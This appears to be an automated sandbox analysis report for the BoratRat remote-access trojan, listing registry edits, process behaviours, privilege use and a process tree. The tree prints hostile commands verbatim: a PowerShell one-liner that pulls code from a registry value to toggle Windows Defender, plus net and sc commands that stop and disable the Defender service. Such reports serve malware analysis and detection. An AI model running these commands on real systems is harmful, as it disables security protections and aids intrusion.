BoratRat.exeOpenWith.exeMiniSearchHost.exeOpenWith.exeOpenWith.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" BoratRat.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell BoratRat.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6 BoratRat.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 BoratRat.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" BoratRat.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" BoratRat.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0 BoratRat.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 BoratRat.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings BoratRat.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 BoratRat.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ BoratRat.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" BoratRat.exe Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic" BoratRat.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\MuiCache MiniSearchHost.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings OpenWith.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 5000310000000000dd5844951000426f726174003c0009000400efbedd584495dd5844952e00000094aa02000000020000000000000000000000000000003ddb1e0042006f00720061007400000014000000 BoratRat.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 BoratRat.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff BoratRat.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\MRUListEx = 00000000ffffffff BoratRat.exe Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = ffffffff BoratRat.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags BoratRat.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ BoratRat.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 = 7800310000000000cb588aad1100557365727300640009000400efbec5522d60dd5826952e0000006c0500000000010000000000000000003a00000000008a45560055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0 = 7e00310000000000dd58449511004465736b746f7000680009000400efbecb588aaddd5845952e000000745702000000010000000000000000003e00000000005eda3d004400650073006b0074006f007000000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370036003900000016000000 BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 01000000030000000200000000000000ffffffff BoratRat.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 BoratRat.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0 BoratRat.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 BoratRat.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} BoratRat.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" BoratRat.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" BoratRat.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" BoratRat.exe Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 00000000ffffffff BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 19002f433a5c000000000000000000000000000000000000000000 BoratRat.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0 = 5000310000000000cb58d9b2100041646d696e003c0009000400efbecb588aaddd5826952e0000006a570200000001000000000000000000000000000000e0ce8400410064006d0069006e00000014000000 BoratRat.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0\NodeSlot = "6" BoratRat.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0\MRUListEx = ffffffff BoratRat.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" BoratRat.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff BoratRat.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell BoratRat.exe Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" BoratRat.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" BoratRat.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" BoratRat.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU BoratRat.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" BoratRat.exe Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 00000000ffffffff BoratRat.exe Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0 BoratRat.exe Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000 BoratRat.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
BoratRat.exepowershell.exepowershell.exetaskmgr.exepid process 3008 BoratRat.exe 3008 BoratRat.exe 3008 BoratRat.exe 3008 BoratRat.exe 3008 BoratRat.exe 3008 BoratRat.exe 3008 BoratRat.exe 3008 BoratRat.exe 3008 BoratRat.exe 3008 BoratRat.exe 3008 BoratRat.exe 3008 BoratRat.exe 3008 BoratRat.exe 3008 BoratRat.exe 3008 BoratRat.exe 3008 BoratRat.exe 3008 BoratRat.exe 3008 BoratRat.exe 3008 BoratRat.exe 3008 BoratRat.exe 3008 BoratRat.exe 3008 BoratRat.exe 3008 BoratRat.exe 3008 BoratRat.exe 3008 BoratRat.exe 4804 powershell.exe 4804 powershell.exe 4804 powershell.exe 4804 powershell.exe 1128 powershell.exe 1128 powershell.exe 1128 powershell.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
Processes:
BoratRat.exetaskmgr.exeOpenWith.exemsinfo32.exepid process 3008 BoratRat.exe 2128 taskmgr.exe 2244 OpenWith.exe 3264 msinfo32.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
Processes:
msedge.exemsedge.exepid process 3720 msedge.exe 3720 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
Client.exepid process 3592 Client.exe -
Suspicious use of AdjustPrivilegeToken 52 IoCs
Processes:
7zG.exeBoratRat.exeClient.exepowershell.exewhoami.exepowershell.exewhoami.exetaskmgr.exeClient.exeunregmp2.exevssvc.exeDECRYPT.exedescription pid process Token: SeRestorePrivilege 3420 7zG.exe Token: 35 3420 7zG.exe Token: SeSecurityPrivilege 3420 7zG.exe Token: SeSecurityPrivilege 3420 7zG.exe Token: SeDebugPrivilege 3008 BoratRat.exe Token: SeDebugPrivilege 1220 Client.exe Token: SeDebugPrivilege 4804 powershell.exe Token: SeDebugPrivilege 4584 whoami.exe Token: SeDebugPrivilege 4584 whoami.exe Token: SeDebugPrivilege 4584 whoami.exe Token: SeDebugPrivilege 4584 whoami.exe Token: SeDebugPrivilege 4584 whoami.exe Token: SeDebugPrivilege 4584 whoami.exe Token: SeDebugPrivilege 4584 whoami.exe Token: SeDebugPrivilege 4584 whoami.exe Token: SeDebugPrivilege 4584 whoami.exe Token: SeDebugPrivilege 4584 whoami.exe Token: SeDebugPrivilege 4584 whoami.exe Token: SeDebugPrivilege 4584 whoami.exe Token: SeDebugPrivilege 4584 whoami.exe Token: SeDebugPrivilege 4584 whoami.exe Token: SeDebugPrivilege 4584 whoami.exe Token: SeDebugPrivilege 4584 whoami.exe Token: SeDebugPrivilege 4584 whoami.exe Token: SeDebugPrivilege 4584 whoami.exe Token: SeDebugPrivilege 4584 whoami.exe Token: SeDebugPrivilege 4584 whoami.exe Token: SeDebugPrivilege 4584 whoami.exe Token: SeDebugPrivilege 4584 whoami.exe Token: SeDebugPrivilege 4584 whoami.exe Token: SeDebugPrivilege 4584 whoami.exe Token: SeDebugPrivilege 4584 whoami.exe Token: SeDebugPrivilege 4584 whoami.exe Token: SeDebugPrivilege 1128 powershell.exe Token: SeDebugPrivilege 2156 whoami.exe Token: SeDebugPrivilege 2156 whoami.exe Token: SeDebugPrivilege 2156 whoami.exe Token: SeDebugPrivilege 2156 whoami.exe Token: SeDebugPrivilege 2156 whoami.exe Token: SeDebugPrivilege 2156 whoami.exe Token: SeDebugPrivilege 2156 whoami.exe Token: SeDebugPrivilege 2156 whoami.exe Token: SeDebugPrivilege 2128 taskmgr.exe Token: SeSystemProfilePrivilege 2128 taskmgr.exe Token: SeCreateGlobalPrivilege 2128 taskmgr.exe Token: SeDebugPrivilege 3592 Client.exe Token: SeShutdownPrivilege 1424 unregmp2.exe Token: SeCreatePagefilePrivilege 1424 unregmp2.exe Token: SeBackupPrivilege 3892 vssvc.exe Token: SeRestorePrivilege 3892 vssvc.exe Token: SeAuditPrivilege 3892 vssvc.exe Token: SeDebugPrivilege 1864 DECRYPT.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
7zG.exeBoratRat.exetaskmgr.exepid process 3420 7zG.exe 3008 BoratRat.exe 3008 BoratRat.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 3008 BoratRat.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
BoratRat.exetaskmgr.exepid process 3008 BoratRat.exe 3008 BoratRat.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 3008 BoratRat.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe 2128 taskmgr.exe -
Suspicious use of SetWindowsHookEx 33 IoCs
Processes:
OpenWith.exeBoratRat.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeMiniSearchHost.exepid process 1784 OpenWith.exe 1784 OpenWith.exe 1784 OpenWith.exe 3008 BoratRat.exe 3008 BoratRat.exe 2244 OpenWith.exe 2244 OpenWith.exe 2244 OpenWith.exe 2244 OpenWith.exe 2244 OpenWith.exe 2244 OpenWith.exe 2244 OpenWith.exe 2244 OpenWith.exe 2244 OpenWith.exe 2244 OpenWith.exe 2244 OpenWith.exe 2244 OpenWith.exe 2244 OpenWith.exe 2244 OpenWith.exe 2244 OpenWith.exe 2244 OpenWith.exe 2244 OpenWith.exe 2244 OpenWith.exe 2244 OpenWith.exe 2244 OpenWith.exe 2244 OpenWith.exe 2244 OpenWith.exe 2244 OpenWith.exe 996 OpenWith.exe 4652 OpenWith.exe 1748 OpenWith.exe 1368 OpenWith.exe 2264 MiniSearchHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Client.exepowershell.exepowershell.exemsedge.exedescription pid process target process PID 1220 wrote to memory of 4804 1220 Client.exe powershell.exe PID 1220 wrote to memory of 4804 1220 Client.exe powershell.exe PID 4804 wrote to memory of 1448 4804 powershell.exe sc.exe PID 4804 wrote to memory of 1448 4804 powershell.exe sc.exe PID 4804 wrote to memory of 788 4804 powershell.exe cmd.exe PID 4804 wrote to memory of 788 4804 powershell.exe cmd.exe PID 4804 wrote to memory of 4584 4804 powershell.exe whoami.exe PID 4804 wrote to memory of 4584 4804 powershell.exe whoami.exe PID 4804 wrote to memory of 2432 4804 powershell.exe net1.exe PID 4804 wrote to memory of 2432 4804 powershell.exe net1.exe PID 4804 wrote to memory of 2476 4804 powershell.exe net1.exe PID 4804 wrote to memory of 2476 4804 powershell.exe net1.exe PID 4804 wrote to memory of 1128 4804 powershell.exe powershell.exe PID 4804 wrote to memory of 1128 4804 powershell.exe powershell.exe PID 1128 wrote to memory of 1876 1128 powershell.exe sc.exe PID 1128 wrote to memory of 1876 1128 powershell.exe sc.exe PID 1128 wrote to memory of 2516 1128 powershell.exe cmd.exe PID 1128 wrote to memory of 2516 1128 powershell.exe cmd.exe PID 1128 wrote to memory of 2156 1128 powershell.exe whoami.exe PID 1128 wrote to memory of 2156 1128 powershell.exe whoami.exe PID 1128 wrote to memory of 4952 1128 powershell.exe net1.exe PID 1128 wrote to memory of 4952 1128 powershell.exe net1.exe PID 1128 wrote to memory of 4272 1128 powershell.exe sc.exe PID 1128 wrote to memory of 4272 1128 powershell.exe sc.exe PID 3720 wrote to memory of 5068 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 5068 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe PID 3720 wrote to memory of 3656 3720 msedge.exe msedge.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:688
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1128 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
PID:1876 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵PID:2516
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2156 -
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" stop windefend3⤵PID:4952
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE3⤵
- Launches sc.exe
PID:4272
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Borat.rar1⤵PID:3740
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1784
-
